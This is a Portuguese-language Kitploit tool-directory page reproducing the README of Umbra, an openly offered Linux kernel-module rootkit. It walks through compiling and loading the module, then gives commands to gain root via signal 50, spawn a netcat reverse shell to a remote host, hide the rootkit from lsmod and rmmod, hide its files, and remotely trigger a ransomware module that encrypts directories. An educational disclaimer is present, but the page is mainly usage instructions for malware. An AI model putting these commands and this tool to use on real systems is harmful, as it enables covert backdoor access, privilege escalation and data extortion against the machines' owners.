Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Umbra — Um rootkit LKM que tem como alvo versões de kernel 4.x e 5.x, abrindo um backdoor que pode gerar um shell reverso para um host remoto, executar malware e muito mais. | Kitploit
Ferramentas/GitHubGitHub/h3xduck/umbra
Escalada de PrivilégiosFerramentas de Criptografia/DescriptografiaMecanismos de PersistênciaEvasão de IDS/IPSPós-ExploraçãoComando e ControleAprendizado e EducaçãoDesenvolvimento de PayloadsCavalo de Troia de Acesso Remoto
GitHubh3xduck/umbra

Umbra

Um rootkit LKM que tem como alvo versões de kernel 4.x e 5.x, abrindo um backdoor que pode gerar um shell reverso para um host remoto, executar malware e muito mais.

136274há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra é um rootkit LKM experimental controlável remotamente para kernels 4.x e 5.x (até 5.7) que abre uma backdoor de rede capaz de gerar reverse shells para hosts remotos, lançar malware remotamente e muito mais.

O rootkit ainda está em desenvolvimento, embora os recursos listados abaixo já estejam totalmente operacionais.

Backdoor in action

Nota: Este rootkit foi desenvolvido e testado usando o kernel 5.4.0 e Ubuntu 18.04.

Features

  • 🌟 Backdoor que gera uma reverse shell para IP remoto após receber um pacote TCP malicioso.
  • 🌟 Use o Umbra Injector para controlar o rootkit remotamente:
    • Reverse shell remota.
    • Ocultar/revelar o rootkit remotamente.
    • Lançar os Umbra Modules.
  • NOVO: Adicionados os Umbra Modules, módulos especiais semelhantes a malware que aprimoram o Umbra e podem ser lançados remotamente pelo Umbra Injector.
  • NOVO: Módulo do Umbra "Ransom", que transforma o Umbra em um ransomware controlável remotamente.

Ransom module in action

  • O Umbra oculta todos os seus arquivos e diretórios de comandos do usuário, como ls.
  • O Umbra pode se ocultar/revelar remotamente e localmente via sinais.
  • Escalação de privilégios ao enviar o sinal 50.
  • Gerar reverse shell netcat no carregamento do módulo.
  • Gerar reverse shell netcat para um host remoto ao enviar o sinal 51.

Mais funcionalidades virão em atualizações futuras.

Disclaimer

Este rootkit é exclusivamente para fins educacionais. Não sou responsável por qualquer dano resultante do seu uso indevido.

Tenha também em mente que o Umbra incorpora apenas mecanismos leves de ocultação e proteção. Ele não foi feito para ser usado em um cenário real.

IMPORTANTE: Se você for testar este rootkit em sua própria máquina, eu recomendo fortemente o uso de uma VM.

Sobre os Umbra Modules: O módulo ransom usa um mecanismo de criptografia trivial, mas pode e certamente irá criptografar qualquer pasta da sua máquina. Embora os arquivos possam ser facilmente descriptografados, eu definitivamente não recomendo executá-lo em sua pasta raiz ou algo semelhante, a menos que esteja em um ambiente controlado.

Table of Contents

  1. Compilar e Instalar
  2. Descarregar o Umbra
  3. Controle Local
  4. Umbra Injector: Controle Remoto
  5. Umbra Modules
    • (NOVO) Ransom
  6. Referências

Compilar e instalar

Lembre-se de que você deve ter um kernel 4.x ou 5.x disponível.

  1. Baixe os arquivos de cabeçalho do seu kernel
root@kitploit:~
apt install linux-headers-$(uname -r)
  1. Configure seu caminho de includes para cobrir o diretório dos cabeçalhos do kernel (geralmente em /usr/src). Se você estiver usando o vscode, pode verificar .vscode/c_cpp_properties.json para um exemplo de quais diretórios incluir.

  2. Clone o projeto

root@kitploit:~
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Compile o Umbra
root@kitploit:~
make
  1. Carregue o Umbra no kernel e configure o ambiente O script instalará o Umbra no kernel e configurará um diretório especial para armazenar os módulos de malware. O diretório será ocultado posteriormente pelo rootkit.
root@kitploit:~
sudo ./install.sh

Se você já executou o script anteriormente e deseja apenas instalar o Umbra no kernel, execute:

root@kitploit:~
sudo insmod ./umbra.ko

Descarregar o Umbra

Certifique-se de que o Umbra não esteja no modo invisível; caso contrário, isso falhará.

root@kitploit:~
sudo rmmod umbra

Controle Local

Alterar os privilégios do usuário atual para root

  • Envie o sinal 50 para qualquer PID.
root@kitploit:~
kill -50 1

Iniciar reverse shell netcat para IP:PORT

  • Defina o IP e a porta desejados em CONFIG.H antes de compilar o rootkit. Por padrão, 127.0.0.1:5888

  • Comece a escutar no host remoto.

root@kitploit:~
nc -lvp 5888
  • Envie o sinal 51 para qualquer PID. O Umbra o capturará e iniciará a shell.
root@kitploit:~
kill -51 1

Nota: O Umbra também tenta iniciar a reverse shell no carregamento.

Ocultar o rootkit - Modo invisível

Isso impedirá que o rootkit seja exibido por comandos como lsmod ou removido via rmmod.

root@kitploit:~
kill -52 1

Revelar o rootkit

Isso reverte o modo invisível, se estiver ativo.

root@kitploit:~
kill -53 1

Umbra Injector: Controle remoto

Obter reverse shell via backdoor

O Umbra Injector pode ser executado antes de o Umbra ser instalado (obtendo a shell assim que ele estiver ativo) ou depois de o Umbra estar instalado no sistema alvo.

root@kitploit:~
./injector -S 127.0.0.1

A backdoor escuta pacotes com o seguinte payload: UMBRA_PAYLOAD_GET_REVERSE_SHELL.

Você também pode criar seu próprio injetor usando a minha biblioteca RawTCP.

Ocultar o rootkit remotamente - Modo invisível

Isso impedirá que o rootkit seja exibido por comandos como lsmod ou removido via rmmod.

root@kitploit:~
./injector -i 127.0.0.1

Revelar o rootkit remotamente

Isso reverte o modo invisível, se estiver ativo.

root@kitploit:~
./injector -u 127.0.0.1

Ajuda

Você pode ver todas as informações sobre como executar o Umbra Injector com:

root@kitploit:~
./injector -h

Umbra Modules

Os Umbra Modules serão armazenados pelo script install.sh em /tmp/umbra, onde o Umbra os ocultará. O diretório não ficará visível para comandos como ls ou similares.

Módulo Ransom

Este módulo pode lançar ataques remotos do tipo ransomware via Umbra Injector. Os arquivos criptografados aparecem com a extensão .ubr.

Atualmente, o mecanismo de criptografia é um simples NOP de nível de bit, como prova de conceito. Você pode editar o módulo para incluir seu próprio algoritmo de criptografia.

Criptografar um diretório e todos os seus subdiretórios

root@kitploit:~
./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

Descriptografar um diretório e todos os seus subdiretórios

root@kitploit:~
./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

Referências

O desenvolvimento deste rootkit envolveu uma quantidade substancial de pesquisa sobre LKMs e técnicas de rootkit. A seguir, uma lista incompleta dos recursos que usei: Como criar LKMs:

  • https://sysprog21.github.io/lkmpg/

Referência de syscalls do Linux:

  • https://syscalls64.paolostivanin.com/

Algumas referências sobre rootkits:

  • https://xcellerator.github.io/posts/
  • https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
  • https://github.com/f0rb1dd3n/Reptile

Licença

Este projeto está licenciado sob a licença GPLv2. Veja LICENSE

Baixar ferramenta